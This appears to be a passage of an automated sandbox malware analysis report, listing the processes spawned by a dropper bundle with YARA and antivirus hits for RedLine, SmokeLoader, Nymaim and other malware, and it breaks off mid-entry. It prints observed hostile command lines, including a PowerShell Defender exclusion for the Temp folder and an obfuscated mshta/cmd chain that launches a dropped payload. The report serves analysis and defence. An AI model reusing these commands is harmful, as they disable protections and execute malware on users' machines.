                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:5
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"
                                      Imagebase:0x910000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:6
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c Mon17742f90b916675f2.exe
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:7
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c Mon17eac6d534bfd22c7.exe
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:8
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c Mon17c604381c7047e.exe
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:9
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c Mon17e1fac3fd3d84b.exe
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:10
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c Mon17b5f403be4d8d6b.exe
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:11
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c Mon17f45359eb9.exe
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:12
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c Mon1785436ae78.exe /mixone
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:13
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c Mon17948100733a95c58.exe
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:14
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe
                                      Wow64 process (32bit):true
                                      Commandline:Mon17eac6d534bfd22c7.exe
                                      Imagebase:0xbd0000
                                      File size:442'368 bytes
                                      MD5 hash:5721981400FAF8EDB9CB2FA1E71404A2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.1820493066.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000002.1820493066.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000000E.00000002.1820493066.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: 0000000E.00000002.1820493066.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 88%, ReversingLabs
                                      Has exited:true

                                      Target ID:15
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c Mon179e1058f256.exe
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:16
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c Mon1795d04d4bd.exe
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:17
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c Mon178817e243.exe
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:18
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe
                                      Wow64 process (32bit):true
                                      Commandline:Mon17742f90b916675f2.exe
                                      Imagebase:0x850000
                                      File size:91'648 bytes
                                      MD5 hash:37A1C118196892AA451573A142EA05D5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 68%, ReversingLabs
                                      Has exited:false

                                      Target ID:19
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe
                                      Wow64 process (32bit):false
                                      Commandline:Mon17c604381c7047e.exe
                                      Imagebase:0x7ff72f5c0000
                                      File size:1'422'336 bytes
                                      MD5 hash:F3B4EE77D66819821E9921B61F969BAE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Generic_malware, Description: Yara Generic_malware, Source: 00000013.00000000.1712308537.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Generic_malware, Description: Yara Generic_malware, Source: 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Generic_malware, Description: Yara Generic_malware, Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 85%, ReversingLabs
                                      Has exited:true

                                      Target ID:21
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe
                                      Wow64 process (32bit):true
                                      Commandline:Mon17e1fac3fd3d84b.exe
                                      Imagebase:0xf0000
                                      File size:1'229'031 bytes
                                      MD5 hash:7C6B2DC2C253C2A6A3708605737AA9AE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 58%, ReversingLabs
                                      Has exited:true

                                      Target ID:22
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Wow64 process (32bit):false
                                      Commandline:Mon178817e243.exe
                                      Imagebase:0xe60000
                                      File size:8'192 bytes
                                      MD5 hash:C213A2444632FFDF0425E0288BCA48B9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe, Author: Joe Security
                                      • Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe, Author: ditekSHen
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 92%, ReversingLabs
                                      Has exited:false

                                      Target ID:23
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe
                                      Wow64 process (32bit):true
                                      Commandline:Mon17b5f403be4d8d6b.exe
                                      Imagebase:0x9c0000
                                      File size:412'160 bytes
                                      MD5 hash:06EE576F9FDC477C6A91F27E56339792
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 66%, ReversingLabs
                                      Has exited:true

                                      Target ID:24
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exe
                                      Wow64 process (32bit):true
                                      Commandline:Mon17f45359eb9.exe
                                      Imagebase:0x400000
                                      File size:348'672 bytes
                                      MD5 hash:BE60D71B303F2AAE5618315147C7D3F9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000018.00000002.1990631383.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000018.00000002.1993787131.0000000001841000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000018.00000002.1993787131.0000000001841000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000018.00000002.1990867892.0000000001710000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000018.00000002.1990867892.0000000001710000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000018.00000002.1993661791.000000000176E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 88%, ReversingLabs
                                      Has exited:true

                                      Target ID:25
                                      Start time:04:57:04
                                      Start date:21/08/2024
                                      Path:C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe
                                      Wow64 process (32bit):true
                                      Commandline:Mon17948100733a95c58.exe
                                      Imagebase:0x560000
                                      File size:432'128 bytes
                                      MD5 hash:B6B87E674629A0F112CB1283B0322CCB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.1780757499.0000000003988000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000019.00000002.1780757499.0000000003988000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000019.00000002.1780757499.0000000003988000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: 00000019.00000002.1780757499.0000000003988000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 81%, ReversingLabs
                                      Has exited:true

                                      Target ID:26
                                      Start time:04:57:04
                                      Start date:21/08/2024
                                      Path:C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      Wow64 process (32bit):true
                                      Commandline:Mon1785436ae78.exe /mixone
                                      Imagebase:0x400000
                                      File size:449'024 bytes
                                      MD5 hash:0FC8BA6DE4099DDC991EADE9B86A6F06
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 0000001A.00000002.4148584124.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_onlyLogger, Description: Yara detected onlyLogger, Source: 0000001A.00000002.4148584124.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000001A.00000002.4148584124.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 0000001A.00000002.4146777079.0000000000400000.00000040.00000001.01000000.00000016.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_onlyLogger, Description: Yara detected onlyLogger, Source: 0000001A.00000002.4146777079.0000000000400000.00000040.00000001.01000000.00000016.sdmp, Author: Joe Security
                                      • Rule: MALWARE_Win_OnlyLogger, Description: Detects OnlyLogger loader variants, Source: 0000001A.00000002.4146777079.0000000000400000.00000040.00000001.01000000.00000016.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 0000001A.00000003.1792106569.0000000001880000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_onlyLogger, Description: Yara detected onlyLogger, Source: 0000001A.00000003.1792106569.0000000001880000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: MALWARE_Win_OnlyLogger, Description: Detects OnlyLogger loader variants, Source: 0000001A.00000003.1792106569.0000000001880000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001A.00000002.4154343968.0000000001A2F000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 92%, ReversingLabs
                                      Has exited:false

                                      Target ID:28
                                      Start time:04:57:04
                                      Start date:21/08/2024
                                      Path:C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe
                                      Wow64 process (32bit):false
                                      Commandline:Mon1795d04d4bd.exe
                                      Imagebase:0x260000
                                      File size:64'000 bytes
                                      MD5 hash:D082843D4E999EA9BBF4D89EE0DC1886
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 81%, ReversingLabs
                                      Has exited:true

                                      Target ID:29
                                      Start time:04:57:04
                                      Start date:21/08/2024
                                      Path:C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exe
                                      Wow64 process (32bit):true
                                      Commandline:Mon179e1058f256.exe
                                      Imagebase:0x400000
                                      File size:439'808 bytes
                                      MD5 hash:ECC773623762E2E326D7683A9758491B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001D.00000002.4154666399.000000000184F000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.4162175054.00000000034EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000002.4162175054.00000000034EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000001D.00000002.4162175054.00000000034EC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.4167060007.0000000006390000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000002.4167060007.0000000006390000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000001D.00000002.4167060007.0000000006390000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001D.00000002.4167060007.0000000006390000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                      • Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: 0000001D.00000002.4167060007.0000000006390000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001D.00000002.4147517573.0000000000400000.00000040.00000001.01000000.0000001A.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.4166034306.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000002.4166034306.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000001D.00000002.4166034306.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001D.00000002.4166034306.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                      • Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: 0000001D.00000002.4166034306.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000001D.00000002.4153571482.00000000017F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000003.1802932881.00000000018A9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000003.1802932881.00000000018A9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000001D.00000003.1802932881.00000000018A9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.4165465602.00000000047D5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000002.4165465602.00000000047D5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000001D.00000002.4165465602.00000000047D5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001D.00000003.1777699508.0000000003140000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 84%, ReversingLabs
                                      Has exited:false

                                      Target ID:30
                                      Start time:04:57:06
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7700 -s 980
                                      Imagebase:0x950000
                                      File size:483'680 bytes
                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:31
                                      Start time:04:57:06
                                      Start date:21/08/2024
                                      Path:C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe
                                      Imagebase:0x4d0000
                                      File size:442'368 bytes
                                      MD5 hash:5721981400FAF8EDB9CB2FA1E71404A2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.4146187466.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001F.00000002.4146187466.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000001F.00000002.4146187466.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: 0000001F.00000002.4146187466.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                      Has exited:false

                                      Target ID:32
                                      Start time:04:57:06
                                      Start date:21/08/2024
                                      Path:C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe
                                      Imagebase:0x3e0000
                                      File size:432'128 bytes
                                      MD5 hash:B6B87E674629A0F112CB1283B0322CCB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000020.00000002.4146181538.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000020.00000002.4146181538.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: 00000020.00000002.4146181538.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                      Has exited:false

                                      Target ID:33
                                      Start time:04:57:06
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\mshta.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                      Imagebase:0x830000
                                      File size:13'312 bytes
                                      MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:34
                                      Start time:04:57:08
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" ) do taskkill /F -Im "%~NxU"
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:35
                                      Start time:04:57:08
                                      Start date:21/08/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:37
                                      Start time:04:57:10
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4544 -s 12
                                      Imagebase:0x950000
                                      File size:483'680 bytes
                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:38
                                      Start time:04:57:11
                                      Start date:21/08/2024
                                      Path:C:\Users\user\AppData\Local\Temp\09xU.exE
                                      Wow64 process (32bit):true
                                      Commandline:9xU.EXE -pPtzyIkqLZoCarb5ew
                                      Imagebase:0x720000
                                      File size:1'229'031 bytes
                                      MD5 hash:7C6B2DC2C253C2A6A3708605737AA9AE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 58%, ReversingLabs
                                      Has exited:true

                                      Target ID:39
                                      Start time:04:57:11
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                      Wow64 process (32bit):true
                                      Commandline:taskkill /F -Im "Mon17e1fac3fd3d84b.exe"
                                      Imagebase:0x200000
                                      File size:74'240 bytes
                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:40
                                      Start time:04:57:12
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\mshta.exe
